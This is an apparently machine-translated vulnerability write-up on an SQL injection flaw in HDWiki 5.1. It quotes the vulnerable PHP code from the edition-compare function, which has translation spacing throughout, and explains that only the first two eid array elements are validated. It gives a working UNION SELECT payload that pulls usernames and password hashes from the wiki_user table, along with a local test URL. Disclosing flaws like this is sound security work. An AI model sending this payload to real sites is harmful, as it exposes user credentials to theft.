Hdwiki5.1 SQL Injection Vulnerability
Hdwiki5.1 SQL Injection Vulnerability
Author: phithon/control/edition. php row 119 function docompare () {if (! Empty ($ this-> setting [''check _ useragent '']) {$ this-> load (''anticopy''); if (! $ _ ENV [''anticopy'']-> check_useragent () {$ this-> message (''access prohibited '', '''', 0 );}} if (! Empty ($ this-> setting [''check _ visitrate'']) {$ this-> load (''anticopy ''); $ _ ENV [''anticopy'']-> check_visitrate ();} if ($ this-> get [4] = ''box '') {@ header (''content-type: text/html; charset = ''. WIKI_CHARSET); if (! @ Is_numeric ($ this-> get [2]) |! @ Is_numeric ($ this-> get [3]) {$ this-> message ($ this-> view-> lang [''parametererror''], ''index. php '', 0) ;}$ did = $ this-> get [2]; $ eid = $ this-> get [3]; $ edition = array (); $ editions = $ _ ENV [''doc '']-> get_edition_list ($ did, '''time', 'authorid', 'author', 'word ', 'images', 'content''', $ eid); $ this-> view-> assign (''version'', $ editions ); $ this-> view-> display (''comparebox''); exit;} if (@! Is_numeric ($ this-> post [''eid''] [0]) | @! Is_numeric ($ this-> post [''eid''] [1]) {$ this-> message ($ this-> view-> lang [''parametererror''], ''index. php '', 0);} $ edition =$ _ ENV [''doc'']-> get_edition ($ this-> post [''eid'']); if ($ edition [0] [''did'']! = $ Edition [1] [''did'']) {$ this-> message ($ this-> view-> lang [''parametererror''], ''index. php '', 0);} pay attention to this sentence if (@! Is_numeric ($ this-> post [''eid''] [0]) | @! Is_numeric ($ this-> post [''eid''] [1]) {$ this-> message ($ this-> view-> lang [''parametererror''], ''index. php '', 0 );} determine $ this-> post ['eid'] [0] and $ this-> post ['eid'] [1]. If one is not a number, an error is returned. Then, pass $ this-> post ['eid'] To the get_edition function to see function get_edition ($ eid) {$ editionlist = array (); if (is_numeric ($ eid) {$ edition = $ this-> db-> fetch_first ("SELECT * FROM ". DB_TABLEPRE. "edition WHERE eid = $ eid"); if ($ edition) {$ edition [''comtime''] = $ edition [''time'']; $ edition [''time''] = $ this-> base-> date ($ edition [''time'']); $ edition [''rawtitle'] = $ edition [''title']; $ edition [''title'] = htmlspecialchars ($ Edition [''title']); if (! $ Edition [''content'']) {$ edition [''content''] = file :: readfromfile ($ this-> get_edition_fileinfo ($ edition [''eid''], ''file') ;}} return $ edition ;} else {$ eid = implode (",", $ eid); $ query = $ this-> db-> query ("SELECT * FROM ". DB_TABLEPRE. "edition WHERE eid IN ($ eid)"); while ($ edition = $ this-> db-> fetch_array ($ query )) {$ edition [''time''] = $ this-> base-> date ($ edition [''time'']); $ edition [''rawtitle'] = $ edition ['' Title '']; $ edition [''title'] = htmlspecialchars ($ edition [''title']); if (! $ Edition [''content'']) {$ edition [''content''] = file :: readfromfile ($ this-> get_edition_fileinfo ($ edition [''eid''], ''file');} $ editionlist [] = $ edition ;} return $ editionlist ;}}
Note the following two sentences:
eid[0]=2&eid[1]=19&eid[2]=-3) UNION SELECT 1,2,35,4,5,6,7,8,9,10,user(),username,password,14,15,16,17,18,19 from wiki_user%23$eid=implode(",",$eid);$query=$this->db->query(" SELECT * FROM ".DB_TABLEPRE."edition WHERE eid IN ($eid)");
Here, you can unbind $ eid and put it into the SQL statement. Therefore, it is definitely not enough for you to determine whether [0] and [1] are numbers. No element in [2] is determined, resulting in injection.
Local test:
To http: // localhost/hdwiki/index. php? Edition-compare-1 send data
(The value must be adjusted according to the actual situation. Otherwise, a parameter error is displayed. For details, see the code. The POC is installed by default)